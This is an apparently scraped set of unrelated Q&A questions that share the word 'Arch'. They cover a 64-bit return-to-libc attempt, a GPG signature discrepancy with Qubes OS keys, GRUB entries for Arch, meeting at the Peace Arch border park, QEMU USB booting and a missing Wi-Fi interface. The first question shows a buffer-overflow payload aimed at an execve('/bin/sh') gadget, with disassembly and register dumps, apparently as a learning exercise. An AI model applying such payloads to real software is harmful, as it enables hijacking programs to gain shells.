Problem with return 2 libc in 64 bit arch

Good day guys I want to perform return to libc in 64 bit architecture using execve. I found a gadget with /bin/sh in it (the /bin/sh offset is 18a143):

   cbcd8:       00 00     cbcda:       4c 89 ea                mov    rdx,r13    cbcdd:       4c 89 e6                mov    rsi,r12    cbce0:       48 8d 3d 5c e4 0b 00    lea    rdi,[rip+0xbe45c]        # 18a143 <_libc_intl_domainname@@GLIBC_2.2.5+0x17e>    cbce7:       e8 94 f9 ff ff          call   cb680 <execve@@GLIBC_2.2.5> --    cbd92:       48 85 c0                test   rax,rax 

now I fill the return address (RIP) with (address of libc + 0xcbce0) with this payload:

r $  (python -c 'print "A"*120 + {libc+-xcbce0}') 

. Here are the registers:

RAX: 0xffffffffffffffff  RBX: 0x0  RCX: 0xffffffffffffff80  RDX: 0x0  RSI: 0x555555555060 (<_start>:  xor    ebp,ebp) RDI: 0x7ffff7f79143 --> 0x68732f6e69622f ('/bin/sh') RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x0  RIP: 0x7ffff7ebacef (<maybe_script_execute+175>:        mov    rax,QWORD PTR [rbp-0x28]) R8 : 0xffffffff  R9 : 0x8a  R10: 0x7fffffffdfb0 ('A' <repeats 120 times>, "443777") R11: 0x202  R12: 0x555555555060 (<_start>:  xor    ebp,ebp) R13: 0x0  R14: 0x0  R15: 0x0 

and here are tho codes around execve:

 0x7ffff7ebace0 <maybe_script_execute+160>:   lea    rdi,[rip+0xbe45c]        # 0x7ffff7f79143    0x7ffff7ebace7 <maybe_script_execute+167>:   call   0x7ffff7eba680 <execve>    0x7ffff7ebacec <maybe_script_execute+172>:   mov    rsp,rbx  0x7ffff7ebacef <maybe_script_execute+175>:   mov    rax,QWORD PTR [rbp-0x28]    0x7ffff7ebacf3 <maybe_script_execute+179>:   sub    rax,QWORD PTR fs:0x28    0x7ffff7ebacfc <maybe_script_execute+188>:   jne    0x7ffff7ebad4b <maybe_script_execute+267>    0x7ffff7ebacfe <maybe_script_execute+190>:   lea    rsp,[rbp-0x18]    0x7ffff7ebad02 <maybe_script_execute+194>:   pop    rbx 

but it not works and gives Bus Error.Thanks for help.

Why is Debian not showing the GPG signatures on keys that Arch Linux is?

I downloaded a Qubes OS ISO and I’m trying to verify its legitimacy using this guide. GPG was behaving weirdly, so I created a separate user with a separate keyring to reproduce the issue.

When I try to verify the key on my Debian system, the signature on the release signing key is not there:

$   gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-master-signing-key.asc gpg: directory '/home/test/.gnupg' created gpg: keybox '/home/test/.gnupg/pubring.kbx' created gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc' gpg: /home/test/.gnupg/trustdb.gpg: trustdb created gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported gpg: Total number processed: 1 gpg:               imported: 1 $   gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-release-4-signing-key.asc gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-release-4-signing-key.asc' gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported gpg: Total number processed: 1 gpg:               imported: 1 $   gpg --list-sigs "Qubes OS" pub   rsa4096 2017-03-06 [SC]       5817A43B283DE5A9181A522E1848792F9E2795E9 uid           [ unknown] Qubes OS Release 4 Signing Key sig 3        1848792F9E2795E9 2017-03-06  Qubes OS Release 4 Signing Key $   

I expected another line with a signature from the master key, such as

sig          DDFA1A3E36879494 2017-03-08  Qubes Master Signing Key 

Surprised, I decided to check on another system. This one is running Arch Linux. I trust it less than the Debian system. Perplexingly, the signature does show up — the output is just as above, but with the added signature line.

The GPG version is 2.2.17 on both machines.

What could be causing this discrepancy?

Ubuntu grub os probe creating bad entry for Arch

I recently did a new build, and wanted Arch on it – I have heard good things about it. Naturally, I also wanted a few others on there to make sure I had something I ‘knew’ how to run. Neither Ubuntu 18.04.2 nor Ubuntu 19.04 was capable of creating a grub entry that could boot Arch, even though they both found it.

Apparently they got fooled by the existence of a microcode update in EFI boot, and attempted to initrd ONLY the microcode, not initramfs-linux.img as exists in the Arch boot setup. I have tried editing the grub.cfg (yes, I know that is not persistent) just to see if that was the (entire) problem, and it appears to be so. The question then, is how do I fix it in a persistent manner?

Thoughts that occur are an attempt to modify the 30_ entry in /etc/default so it works better – skipping 30_ and doing a 40_custom for the other distros – using another boot loader? Is there an even better way – that doesn’t require modifying each additional distro after installation, perhaps? I would hate to have to add “/initramfs-linux.img” to the Arch entries in grub.cfg over and over…

freebird54

Peace Arch without exiting USA

For the purposes of this question, assume I am of a legal status which prevents me from exiting the US. I have a friend who I would like to visit, but they’re unable to secure a US Visa, though they can secure a Canadian one.

My friend and I decide to meet at the Peace Arch, and my friend crosses over to the US side of the park, but I do not.

Would it be possible to meet this friend, exchange pleasantries, and perhaps a hug, without technically exiting the US from the eyes of US immigration? Would I have to talk to CBP when I leave the park?

How to boot an Arch USB device in QEMU and save to a VM?

I’m trying to get an Arch Linux QEMU-KVM hypervisor going.

I used the same USB to originally download Arch-linux to my machine using rufus on my windows to setup the archlinux iso on it.

sudo qemu-system-x86_64 -enable-kvm -nographic -m 384 \ -drive file=/dev/sdb,format=raw,index=0,media=disk \ -hda /media/guestos/webServer/image.qcow2 

Where /dev/sdb is the usb and /dev/sda5 is mounted to /media/guestos/webServer

If I include the last line, I get error:

qemu-system-x86_64: -hda /media/guestos/webServer/image.qcow2: drive with bus=0, unit=0 (index=0) exists 

If I remove the last line, the usb is able to start booting, but it doesn’t show anything after it says “loading archlinux.iso”

If I boot my normal OS, it says Ok a bunch of times, at the part QEMU stops at. When I’m running QEMU the screen just shows a flashing pointer in the top left and that’s it.

How do I fully boot from the USB in qemu? For the initial setup do I have to include the .qcow2 image I plan to save it to in my startup command or am I able to switch to console mode and save it through that?

How to manually create a wireless interface for an Arch linux computer

I have recently installed Arch for the first time, and I am having extreme difficulty setting up my wifi. The physical hardware and drivers are there, and listed by the computer

$   lspci -k ---snipped---  0c:00.0 Network controller: Broadcom Inc. and subsidiaries BCM4312 802.11b/g LP-PHY (rev 01)     Subsystem: Dell Wireless 1397 WLAN Mini-Card     Kernel driver in use: b43-pci-bridge     Kernel modules: ssb 

and this is the output ip link:

$  ip link 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2: enp0s25: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN mode DEFAULT group default qlen 1000     link/ether 00:24:e8:9f:a2:a3 brd ff:ff:ff:ff:ff:ff 00:00.0  

See the problem? There is a device, and drivers, but no wlan0 interface. Now, I have read a few articles about it, but none had circumstances like mine. What is the recommended way to do this (I have wifi-menu installed, but it is having issues)? Are there files I can create, or will I need to do something more along the lines of

$   ip address add 

Thank you. If this question is not direct, please advise me on a more educated question.